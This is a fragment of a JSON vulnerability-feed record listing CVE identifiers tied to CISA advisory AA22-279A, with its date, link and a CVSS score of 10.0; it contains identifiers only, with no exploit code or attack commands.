"CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134", "CVE-2023-27350"], "modified": "2022-10-06T12:00:00", "id": "AA22-279A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-279a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}